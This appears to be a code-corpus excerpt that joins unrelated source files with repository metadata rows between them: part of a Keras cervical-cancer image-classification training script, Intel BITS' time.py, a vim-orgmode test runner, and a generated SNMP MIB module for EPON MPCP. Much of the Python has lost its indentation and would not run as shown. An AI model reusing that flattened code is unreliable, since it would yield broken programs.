matRot = np.array([[cosa, sina, 0.], [-sina, cosa, 0.], [0., 0., 1.]])
matShiftF = np.array([[1., 0., +pcnt[0]], [0., 1., +pcnt[1]], [0., 0., 1.]])
matScale = np.array([[pscale, 0., 0.], [0., pscale, 0.], [0., 0., 1.]])
matShiftCrop = np.array([[1., 0., pcropSize[0] / 2.], [0., 1., pcropSize[1] / 2.], [0., 0., 1.]])
# matTotal_OCV = matShiftF.dot(matRot.dot(matScale.dot(matShiftB)))
# (3) build total-matrix
matTotal = matShiftCrop.dot(matRot.dot(matScale.dot(matShiftB)))
if isDebug:
print ('(1) mat-shift-backward = \n{0}'.format(matShiftB))
print ('(2) mat-scale = \n{0}'.format(matScale))
print ('(3) mat-rot = \n{0}'.format(matRot))
print ('(4) mat-shift-forward = \n{0}'.format(matShiftF))
print ('(5) mat-shift-crop = \n{0}'.format(matShiftCrop))
print ('---\n(*) mat-total = \n{0}'.format(matTotal))
# (4) warp image with total affine-transform
imgRet = cv2.warpAffine(pimg, matTotal[:2, :], pcropSize)
return imgRet
def prepareCervixAndChannelInfo(pimg, pRelChnSize = 0.4, isDebug = False):
# (1) prepare masks
tmsk = pimg[:, :, 3]
timg = pimg[:, :, :3]
tmsk_chn = (tmsk == 128)
tmsk_crv = (tmsk > 100)
# rc - mean first-idx -> row, second-idx -> column, xy - mean first-idx -> column, second-idx -> row :)
# (2) find channel cover-circle and center of this corcle
rc_pts_channel = np.array(np.where(tmsk_chn)).transpose()
(rc_channel_cnt, r_channel) = cv2.minEnclosingCircle(rc_pts_channel)
dist_chn2cnt = calcDistArr2Point(rc_pts_channel, rc_channel_cnt)
r_channel_good = rc_pts_channel[dist_chn2cnt < pRelChnSize * r_channel, :]
#FIXME: Fill holes before this step!!!
# (2) prepare cervix contour
contour_crv = tmsk_crv & (~skmorph.erosion(tmsk_crv, skmorph.disk(1)))
rc_crvContour = np.array(np.where(contour_crv)).transpose()
dist_contour2cnt = calcDistArr2Point(rc_crvContour, rc_channel_cnt)
r_cervix = np.min(dist_contour2cnt)
# rcCrvRminArg = np.argmin(rcRContour)
if r_cervix<r_channel:
r_cervix = r_channel
ret = {
'r_crv': r_cervix,
'r_chn': r_channel,
'r_chn_good': pRelChnSize * r_channel,
'cnt_chn': rc_channel_cnt,
'rc_chn': r_channel_good.copy()
}
if isDebug:
retSize = 256
newScale = float(retSize)/(2.*r_cervix + 2.)
xy_channel_cnt = rc_channel_cnt[::-1]
timg_crop = buildImageWithRotScaleAroundCenter(timg, xy_channel_cnt, 45., newScale, (retSize, retSize), isDebug=False)
#
plt.subplot(2, 2, 1)
plt.imshow(tmsk_chn)
plt.gcf().gca().add_artist(plt.Circle(rc_channel_cnt[::-1], r_channel, edgecolor='r', fill=False))
plt.gcf().gca().add_artist(plt.Circle(rc_channel_cnt[::-1], r_cervix, edgecolor='g', fill=False))
plt.plot(r_channel_good[:, 1], r_channel_good[:, 0], 'y.')
plt.subplot(2, 2, 2)
plt.imshow(tmsk_crv)
plt.gcf().gca().add_artist(plt.Circle(rc_channel_cnt[::-1], r_channel, edgecolor='r', fill=False))
plt.gcf().gca().add_artist(plt.Circle(rc_channel_cnt[::-1], r_cervix, edgecolor='g', fill=False))
plt.subplot(2, 2, 3)
plt.imshow(timg)
plt.gcf().gca().add_artist(plt.Circle(rc_channel_cnt[::-1], r_channel, edgecolor='r', fill=False))
plt.gcf().gca().add_artist(plt.Circle(rc_channel_cnt[::-1], r_cervix, edgecolor='g', fill=False))
plt.subplot(2, 2, 4)
plt.imshow(timg_crop)
plt.show()
return ret
def buildImgInfoList(dataImg):
numImg = dataImg.shape[0]
print (":: Prepare image info ({0})".format(dataImg.shape))
ret = []
for ii in range(numImg):
timg = dataImg[ii]
tinfo = prepareCervixAndChannelInfo(timg)
ret.append(tinfo)
if (ii%10)==0:
print ('[{0}/{1}]'.format(ii, numImg))
return ret
#####################################################
def readDataImagesCls(pidx, wdir=None, maxNum=None):
if wdir is None:
wdir = os.path.dirname(pidx)
tdata = pd.read_csv(pidx)
if maxNum is not None:
numData = len(tdata)
if maxNum>numData:
maxNum = numData
tdata = tdata[:maxNum]
#
dataY = tdata['type'].as_matrix() - 1
tnumCls = len(np.unique(dataY))
dataY = np_utils.to_categorical(dataY, tnumCls)
lstpath = tdata['path'].as_matrix()
lstpath = [os.path.join(wdir, xx) for xx in lstpath]
dataPaths = lstpath
numPath = len(lstpath)
dataX = None
print (':: read images into memory...')
for ipath, path in enumerate(lstpath):
timg = skio.imread(path)
if dataX is None:
dataX = np.zeros([numPath] + list(timg.shape), dtype=np.uint8)
if (ipath%20)==0:
print ('\t[{0}/{1}]'.format(ipath, numPath))
dataX[ipath] = timg
return dataX, dataY, dataPaths
#####################################################
def getRandomInRange(vrange, pnum=None):
vmin,vmax = vrange
if pnum is None:
trnd = np.random.rand()
else:
trnd = np.random.rand(pnum)
ret = vmin + (vmax-vmin)*trnd
return ret
def preprocImgForInference(pimg, pinfo, angleRange=(-16.,+16.), batchSize = 16, imsize=256, isRandomize=False):
sizeCrop = (imsize, imsize)
dataX = np.zeros((batchSize, imsize, imsize, 3))
timg = pimg[:, :, :3]
CNT_chn_rc = pinfo['cnt_chn']
PTS_chn_rc = pinfo['rc_chn']
R_chn = pinfo['r_chn_good']
R_crv = pinfo['r_crv']
for ii in range(batchSize):
# R_crop = R_crv
if R_chn < 10:
R_chn = 10.
if isRandomize:
R_crop = getRandomInRange([0.6 * R_crv, 1.2 * R_crv])
else:
R_crop = R_crv
if PTS_chn_rc.shape[0]>0:
rndChnPos = np.random.randint(PTS_chn_rc.shape[0])
P_Center_XY = PTS_chn_rc[rndChnPos][::-1]
else:
P_Center_XY = CNT_chn_rc
#
if isRandomize:
angleCrop = getRandomInRange(angleRange)
else:
angleCrop = 0.
scaleCrop2 = (float(imsize) / (2. * R_crop + 2.))
#
timgCrop = buildImageWithRotScaleAroundCenter(timg, P_Center_XY, angleCrop, scaleCrop2, sizeCrop, isDebug=False)
timgCrop = (timgCrop.astype(np.float) / 127.5 - 1.0)
dataX[ii] = timgCrop
return dataX
#####################################################
def train_generator_CHANNEL_CLS(dataImg, dataCls, dataImgInfo, batchSize=64, imsize = 256,
isRandomize=True,
angleRange=(-16.,+16.),
scaleRange=(1.0, 1.0), fun_random_val=None):
numImg = dataImg.shape[0]
sizeCrop = (imsize, imsize)
imgIdx = list(range(numImg))
while True:
# rndIdx = np.random.permutation(imgIdx)[:batchSize]
rndIdx = np.random.randint(0,numImg, batchSize)
dataX = np.zeros((batchSize, imsize, imsize, 3))
dataY = np.zeros((batchSize, dataCls.shape[-1]))
# dataImgG = dataImg[rndIdx]
rndShiftMean = 0.2*getRandomInRange((-1., 1.0), pnum=batchSize)
rndShiftStd = 1.0 + 0.2 * getRandomInRange((-1.0, 1.0), pnum=batchSize)
#
for ii, idx in enumerate(rndIdx):
# timg = dataImgG[ii][:,:,:3]
timg = dataImg[idx][:, :, :3]
tinf = dataImgInfo[idx]
CNT_chn_rc = tinf['cnt_chn']
PTS_chn_rc = tinf['rc_chn']
R_chn = tinf['r_chn_good']
R_crv = tinf['r_crv']
# R_crop = R_crv
if R_chn<10:
R_chn = 10.
R_crop = getRandomInRange([0.6*R_crv, 1.2*R_crv])
# R_crop = R_chn * 3.
# ----
# if R_chn<10:
# R_chn = 10.
# K_chn2crv = float(R_chn)/float(R_crv)
# K_max = 3.
# if K_chn2crv>K_max:
# R_crop = R_chn * K_max
# ----
rndChnPos = np.random.randint(PTS_chn_rc.shape[0])
P_Center_XY = PTS_chn_rc[rndChnPos][::-1]
#
if isRandomize:
angleCrop = getRandomInRange(angleRange)
scaleCrop = getRandomInRange(scaleRange)
else:
angleCrop = 0.
scaleCrop = 1.
scaleCrop2 = scaleCrop * (float(imsize)/(2.*R_crop + 2.))
#
timgCrop = buildImageWithRotScaleAroundCenter(timg, P_Center_XY, angleCrop, scaleCrop2, sizeCrop, isDebug=False)
if fun_random_val is not None:
timgCrop = fun_random_val(timgCrop)
timgCrop = (timgCrop.astype(np.float)/127.5 - 1.0)
if isRandomize:
timgCrop -= rndShiftMean[ii]
timgCrop *= rndShiftStd[ii]
dataX[ii] = timgCrop
dataY[ii] = dataCls[idx]
yield (dataX, dataY)
#####################################################
if __name__ == '__main__':
# (1) Setup Tran/Validation data
fidxTrn = '/home/ar/@Kaggle/01_Intel_&_MobileODT_Cervical_Cancer_Screening/data/train-x512-processed-stage2/01-data-512x512/idx.txt-train.txt'
fidxVal = '/home/ar/@Kaggle/01_Intel_&_MobileODT_Cervical_Cancer_Screening/data/train-x512-processed-stage2/01-data-512x512/idx.txt-val.txt'
wdir = os.path.dirname(fidxTrn)
# (2) Input/Output models
pathModelValLoss = '{0}/model_CNN_Classification_valLoss_v1.h5'.format(wdir)
pathModelValAcc = '{0}/model_CNN_Classification_valAcc_v1.h5'.format(wdir)
pathModelLatest = '{0}/model_CNN_Classification_Latest_v1.h5'.format(wdir)
pathLog = '%s-log.csv' % pathModelValLoss
# (3) Continue training from checkpoint Model (if exists)
pathModelRestart = pathModelValLoss
if not os.path.isfile(pathModelRestart):
print (':: Trained model not found: build new model...')
model = buildModelCNN_Classification(numConv=1, ppadding='same', numHidden=128)
model.compile(optimizer='adam',
loss='categorical_crossentropy',
metrics=['accuracy'])
else:
print ('!!! WARNING !!! Found trained model, loading... [{0}]'.format(pathModelRestart))
pref = time.strftime('%Y.%m.%d-%H.%M.%S')
pathModelValBk = '%s-%s.bk' % (pathModelValLoss, pref)
pathModelValAccBk = '%s-%s.bk' % (pathModelValAcc, pref)
pathModelLatestBk = '%s-%s.bk' % (pathModelLatest, pref)
shutil.copy(pathModelValLoss, pathModelValBk)
shutil.copy(pathModelValAcc, pathModelValAccBk)
# shutil.copy(pathModelLatest, pathModelLatestBk)
model = keras.models.load_model(pathModelRestart)
model.summary()
# (4) Preload data
trnX, trnY, _ = readDataImagesCls(fidxTrn)
valX, valY, _ = readDataImagesCls(fidxVal) #, maxNum=10)
# trnX, trnY = valX, valY
trnInfo = buildImgInfoList(trnX)
valInfo = buildImgInfoList(valX)
# (5) prepare image generator
numTrn = trnX.shape[0]
numVal = valX.shape[0]
imgSize = 256
batchSize = 64
numEpochs = 1000
    numIterPerEpochTrn = 2 * numTrn // batchSize  # integer step counts for fit_generator
    numIterPerEpochVal = 1 * numVal // batchSize
if numIterPerEpochTrn<1:
numIterPerEpochTrn = 1
generatorTrn = train_generator_CHANNEL_CLS(dataImg=trnX, dataCls=trnY, dataImgInfo=trnInfo,
batchSize=batchSize,
isRandomize=True,
fun_random_val=None,
# fun_random_val=preproc_image
)
generatorVal = train_generator_CHANNEL_CLS(dataImg=valX, dataCls=valY, dataImgInfo=valInfo,
batchSize=1024,
# batchSize=batchSize,
isRandomize=False, fun_random_val=None)
# (6) Generate fixed validation data
valX_ext, valY_ext = next(generatorVal)
# (7) Train model
model.fit_generator(
generator=generatorTrn,
steps_per_epoch=numIterPerEpochTrn,
epochs=numEpochs,
validation_data=(valX_ext, valY_ext),
# validation_data=generatorVal,
# validation_steps=numIterPerEpochVal,
callbacks=[
kall.ModelCheckpoint(pathModelValLoss, verbose=True, save_best_only=True, monitor='val_loss'),
kall.ModelCheckpoint(pathModelValAcc, verbose=True, save_best_only=True, monitor='val_acc'),
# kall.ModelCheckpoint(pathModelLatest, verbose=True, save_best_only=False),
kall.CSVLogger(pathLog, append=True)
])
| 41.871212
| 146
| 0.581147
|
ee9fbf910165fc49a236a2cc60bbbd03db9bffc1
| 3,321
|
py
|
Python
|
python/time.py
|
3mdeb/bits
|
19da7046a7303f1de8b53165eea1a6f486757c03
|
[
"BSD-3-Clause"
] | 215
|
2015-08-05T07:31:35.000Z
|
2022-03-25T17:34:54.000Z
|
python/time.py
|
marcol3786/bits
|
19da7046a7303f1de8b53165eea1a6f486757c03
|
[
"BSD-3-Clause"
] | 12
|
2015-09-07T14:09:53.000Z
|
2021-04-07T05:03:26.000Z
|
python/time.py
|
marcol3786/bits
|
19da7046a7303f1de8b53165eea1a6f486757c03
|
[
"BSD-3-Clause"
] | 71
|
2015-08-05T02:35:13.000Z
|
2022-02-11T21:16:39.000Z
|
# Copyright (c) 2011, Intel Corporation
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of Intel Corporation nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""time module."""
import _bits
from collections import namedtuple
struct_time = namedtuple('struct_time', ['tm_year', 'tm_mon', 'tm_mday',
'tm_hour', 'tm_min', 'tm_sec',
'tm_wday', 'tm_yday', 'tm_isdst'])
#accept2dyear
#altzone
#asctime
#clock
#ctime
#daylight
def localtime(seconds = None):
"""
localtime([seconds]) -> (tm_year,tm_mon,tm_mday,tm_hour,tm_min,
tm_sec,tm_wday,tm_yday,tm_isdst)
Convert seconds since the Epoch to a time tuple expressing local time.
When 'seconds' is not passed in, convert the current time instead.
"""
if seconds is not None:
loctime = struct_time(*_bits._localtime(seconds))
else:
loctime = struct_time(*_bits._localtime())
    if (loctime.tm_year % 400) == 0:
        leap_year = 1
    elif (loctime.tm_year % 100) == 0:
        leap_year = 0
    elif (loctime.tm_year % 4) == 0:
        leap_year = 1
    else:
        leap_year = 0
    # The leap day only shifts the ordinal date for months after February.
    ordinaldate = sum([31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31][0:loctime.tm_mon-1]) + loctime.tm_mday
    if loctime.tm_mon > 2:
        ordinaldate += leap_year
    return loctime._replace(tm_yday = ordinaldate)
# Support gmtime for compatibility with callers. Timezones intentionally
# ignored; always assumes localtime matches UTC.
gmtime = localtime
#mktime
def sleep(seconds):
"""sleep(seconds)
Delay execution for a given number of seconds. The argument may be
a floating point number for subsecond precision."""
if seconds < 0:
raise ValueError("seconds must not be negative")
start = time()
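    # BITS runs pre-OS, so there is no scheduler to yield to; the delay is a
    # busy-wait against the platform time source exposed by _bits.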
while time() - start < seconds:
pass
#strftime
#strptime
#struct_time
time = _bits._time
#timezone
#tzname
#tzset
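# Worked example of the day-of-year arithmetic used by localtime() above
# (illustrative only; the helper below is an assumption and is not used by BITS):
# March 1st of a leap year such as 2012 is ordinal day 31 + 29 + 1 = 61, while
# in a common year such as 2011 it is 31 + 28 + 1 = 60, so the leap-day
# correction only applies to months after February.
_DAYS_IN_MONTH = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
def _day_of_year(year, month, day):
    """Illustrative helper mirroring the ordinal-date computation in localtime()."""
    leap = 1 if (year % 4 == 0 and (year % 100 != 0 or year % 400 == 0)) else 0
    return sum(_DAYS_IN_MONTH[:month - 1]) + day + (leap if month > 2 else 0)
# _day_of_year(2012, 3, 1) == 61 and _day_of_year(2011, 3, 1) == 60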
| 34.59375
| 121
| 0.696477
|
baa149ccc47be68301164ce436ac3fbcd809f2e0
| 1,523
|
py
|
Python
|
bundle/vim-orgmode/tests/run_tests.py
|
ninegrid/dotfiles-vim
|
4604f8a2e114cb2e98d5d79f2f41048c4f564b02
|
[
"Unlicense"
] | null | null | null |
bundle/vim-orgmode/tests/run_tests.py
|
ninegrid/dotfiles-vim
|
4604f8a2e114cb2e98d5d79f2f41048c4f564b02
|
[
"Unlicense"
] | null | null | null |
bundle/vim-orgmode/tests/run_tests.py
|
ninegrid/dotfiles-vim
|
4604f8a2e114cb2e98d5d79f2f41048c4f564b02
|
[
"Unlicense"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import test_vimbuffer
import test_libagendafilter
import test_libcheckbox
import test_libbase
import test_libheading
import test_liborgdate
import test_liborgdate_parsing
import test_liborgdatetime
import test_liborgtimerange
import test_plugin_date
import test_plugin_edit_structure
import test_plugin_edit_checkbox
import test_plugin_misc
import test_plugin_navigator
import test_plugin_show_hide
import test_plugin_tags_properties
import test_plugin_todo
import test_plugin_mappings
import unittest
if __name__ == '__main__':
tests = unittest.TestSuite()
tests.addTests(test_vimbuffer.suite())
# lib
tests.addTests(test_libbase.suite())
tests.addTests(test_libcheckbox.suite())
tests.addTests(test_libagendafilter.suite())
tests.addTests(test_libheading.suite())
tests.addTests(test_liborgdate.suite())
tests.addTests(test_liborgdate_parsing.suite())
tests.addTests(test_liborgdatetime.suite())
tests.addTests(test_liborgtimerange.suite())
# plugins
tests.addTests(test_plugin_date.suite())
tests.addTests(test_plugin_edit_structure.suite())
tests.addTests(test_plugin_edit_checkbox.suite())
tests.addTests(test_plugin_misc.suite())
tests.addTests(test_plugin_navigator.suite())
tests.addTests(test_plugin_show_hide.suite())
tests.addTests(test_plugin_tags_properties.suite())
tests.addTests(test_plugin_todo.suite())
tests.addTests(test_plugin_mappings.suite())
runner = unittest.TextTestRunner()
runner.run(tests)
# vim: set noexpandtab:
| 26.258621
| 52
| 0.829941
|
f3c2b79084395356f9c28fa931aad64fb389a6ea
| 58,208
|
py
|
Python
|
pysnmp-with-texts/A3COM-HUAWEI-DOT3-EFM-EPON-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 8
|
2019-05-09T17:04:00.000Z
|
2021-06-09T06:50:51.000Z
|
pysnmp-with-texts/A3COM-HUAWEI-DOT3-EFM-EPON-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 4
|
2019-05-31T16:42:59.000Z
|
2020-01-31T21:57:17.000Z
|
pysnmp-with-texts/A3COM-HUAWEI-DOT3-EFM-EPON-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 10
|
2019-04-30T05:51:36.000Z
|
2022-02-16T03:33:41.000Z
|
#
# PySNMP MIB module A3COM-HUAWEI-DOT3-EFM-EPON-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/A3COM-HUAWEI-DOT3-EFM-EPON-MIB
# Produced by pysmi-0.3.4 at Wed May 1 11:04:35 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
h3cEpon, = mibBuilder.importSymbols("A3COM-HUAWEI-OID-MIB", "h3cEpon")
Integer, ObjectIdentifier, OctetString = mibBuilder.importSymbols("ASN1", "Integer", "ObjectIdentifier", "OctetString")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueRangeConstraint, ConstraintsUnion, ValueSizeConstraint, ConstraintsIntersection, SingleValueConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "ConstraintsUnion", "ValueSizeConstraint", "ConstraintsIntersection", "SingleValueConstraint")
ifIndex, = mibBuilder.importSymbols("IF-MIB", "ifIndex")
ObjectGroup, NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "ObjectGroup", "NotificationGroup", "ModuleCompliance")
iso, Integer32, Counter64, ModuleIdentity, MibIdentifier, ObjectIdentity, Bits, Gauge32, TimeTicks, Unsigned32, MibScalar, MibTable, MibTableRow, MibTableColumn, Counter32, IpAddress, mib_2, NotificationType = mibBuilder.importSymbols("SNMPv2-SMI", "iso", "Integer32", "Counter64", "ModuleIdentity", "MibIdentifier", "ObjectIdentity", "Bits", "Gauge32", "TimeTicks", "Unsigned32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Counter32", "IpAddress", "mib-2", "NotificationType")
TruthValue, TextualConvention, MacAddress, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TruthValue", "TextualConvention", "MacAddress", "DisplayString")
h3cDot3EfmeponMIB = ModuleIdentity((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2))
h3cDot3EfmeponMIB.setRevisions(('2004-09-21 00:00',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    if mibBuilder.loadTexts: h3cDot3EfmeponMIB.setRevisionsDescriptions(('Initial version, published as RFC XXXX.',))
if mibBuilder.loadTexts: h3cDot3EfmeponMIB.setLastUpdated('200409210000Z')
if mibBuilder.loadTexts: h3cDot3EfmeponMIB.setOrganization('IETF Ethernet Interfaces and Hub MIB Working Group')
if mibBuilder.loadTexts: h3cDot3EfmeponMIB.setContactInfo('WG charter: http://www.ietf.org/html.charters/hubmib-charter.html Mailing Lists: General Discussion: hubmib@ietf.org To Subscribe: hubmib-request@ietf.org In Body: subscribe your_email_address Chair: Dan Romascanu Postal: Avaya Inc. Atidim Technology Park, Bldg. 3 Tel Aviv 61131 Israel Tel: +972-3-645-8414 E-mail: dromasca@avaya.com Editor: Lior Khermosh Postal: Passave Technologies Inc. Ackerstein Towers, Tower A, 6th floor, 9 Hamenofim St. Hertzliya Pituach 46725, ISRAEL P.O.Box 2089 Hertzliya Pituach 46120 Israel Tel: +972-9-9717600 Ext: 7181 E-mail: lior.khermosh@passave.com')
if mibBuilder.loadTexts: h3cDot3EfmeponMIB.setDescription("The objects in this MIB module are used to manage the Ethernet in the First Mile (EFM) Multi Point Control Protocol (MPCP) Interfaces as defined in IEEE Draft P802.3ah/D3.0 clause 64,65. The following reference is used throughout this MIB module: [802.3ah] refers to: IEEE Draft P802.3ah/D3.3: 'Draft amendment to - Information technology - Telecommunications and information exchange between systems - Local and metropolitan area networks - Specific requirements - Part 3: Carrier sense multiple access with collision detection (CSMA/CD) access method and physical layer specifications - Media Access Control Parameters, Physical Layers and Management Parameters for subscriber access networks', 22 April 2004. Of particular interest are Clause 64(MPCP) 65(P2MP RS) and 60 (PON PMDs). Clause 30, 'Management', and Clause 45, 'Management Data Input/Output (MDIO) Interface'. Copyright (C) The Internet Society (2004). This version of this MIB module is part of XXXX see the RFC itself for full legal notices.")
h3cDot3MpcpMIB = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1))
h3cDot3MpcpObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1))
h3cDot3MpcpConformance = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 2))
h3cDot3MpcpTable = MibTable((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 1), )
if mibBuilder.loadTexts: h3cDot3MpcpTable.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpTable.setDescription('Table for dot3 Multi-Point Control Protocol (MPCP) MIB modules.')
h3cDot3MpcpEntry = MibTableRow((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 1, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"))
if mibBuilder.loadTexts: h3cDot3MpcpEntry.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpEntry.setDescription('An entry in the dot3 MPCP MIB modules table.')
h3cDot3MpcpID = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 1, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpID.setReference('[802.3ah], 30.3.5.1.1.')
if mibBuilder.loadTexts: h3cDot3MpcpID.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpID.setDescription('This variable is assigned so as to uniquely identify the Multi-Point MAC Control (MPCP) entity, as defined in [802.3ah] clause 64, among the subordinate managed objects of the containing object. This attribute is relevant for an OLT and an ONU.')
h3cDot3MpcpOperStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 1, 1, 2), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpOperStatus.setReference('[802.3ah], 30.3.5.1.2.')
if mibBuilder.loadTexts: h3cDot3MpcpOperStatus.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpOperStatus.setDescription('This variable can be used to define the operational state of the Multi-Point MAC Control sublayer as defined in [802.3ah] clause 64. Selecting admin for an interface with Multi-Point MAC Control sublayer. When the attribute is True the interface will act as if Multi-point control protocol is enabled. When the attribute is False the interface will act as if it does not have the Multi-point control protocol. The operational state can be changed using the h3cDot3MpcpAdminState attribute. This attribute is relevant for an OLT and an ONU.')
h3cDot3MpcpMode = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 1, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("olt", 1), ("onu", 2))).clone(1)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: h3cDot3MpcpMode.setReference('[802.3ah], 30.3.5.1.3.')
if mibBuilder.loadTexts: h3cDot3MpcpMode.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpMode.setDescription('This variable can be used to identify the operational state of the Multi-Point MAC Control sublayer as defined in [802.3ah] clause 64. Selecting olt(1) for an OLT (server) mode and onu(2) for an ONU (client) mode. Writing can be done only during initialization, when h3cDot3MpcpOperStatus indicates False. This attribute is relevant for an OLT and an ONU.')
h3cDot3MpcpLinkID = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 1, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpLinkID.setReference('[802.3ah], 30.3.5.1.4.')
if mibBuilder.loadTexts: h3cDot3MpcpLinkID.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpLinkID.setDescription('A read-only value that identifies the Logical Link identity (LLID) associated with the MAC port as specified in [802.3ah] clause 65.1.3.2.2. This attribute is relevant for an OLT and an ONU.')
h3cDot3MpcpRemoteMACAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 1, 1, 5), MacAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpRemoteMACAddress.setReference('[802.3ah], 30.3.5.1.5.')
if mibBuilder.loadTexts: h3cDot3MpcpRemoteMACAddress.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpRemoteMACAddress.setDescription('A read-only value that identifies the source_address parameter of the last MPCPDUs passed to the MAC Control. This value is updated on reception of a valid frame with (1) a destination Field equal to the reserved multicast address for MAC Control specified in [802.3ah] Annex 31A, (2) lengthOrType field value equal to the reserved Type for MAC Control as specified in [802.3ah] Annex 31A. (3) an MPCP subtype value equal to the subtype reserved for MPCP as specified in [802.3ah] Annex 31A. This attribute is relevant for an OLT and an ONU.')
h3cDot3MpcpRegistrationState = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 1, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("unregistered", 1), ("registering", 2), ("registered", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpRegistrationState.setReference('[802.3ah], 30.3.5.1.6.')
if mibBuilder.loadTexts: h3cDot3MpcpRegistrationState.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpRegistrationState.setDescription('A read-only value that identifies the operational state of the Multi-Point MAC Control sublayer as defined in [802.3ah] clause 64. When this attribute has the enumeration unregistered(1) the interface may be used for registering a link partner. When this attribute has the enumeration registering(2) the interface is in the process of registering a link-partner. When this attribute has the enumeration registered(3) the interface has an established link-partner. This attribute is relevant for an OLT and an ONU. For the OLT it provides an indication per LLID.')
h3cDot3MpcpTransmitElapsed = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 1, 1, 7), Integer32()).setUnits('TQ (16nsec)').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpTransmitElapsed.setReference('[802.3ah], 30.3.5.1.19.')
if mibBuilder.loadTexts: h3cDot3MpcpTransmitElapsed.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpTransmitElapsed.setDescription('A read-only value that reports the interval from last MPCP frame transmission in increments of Time Quanta (TQ) 16ns. The value returned shall be (interval from last MPCP frame transmission in ns)/16. If this value exceeds (2^32-1) the value (2^32-1) shall be returned. This attribute is relevant for an OLT and an ONU.')
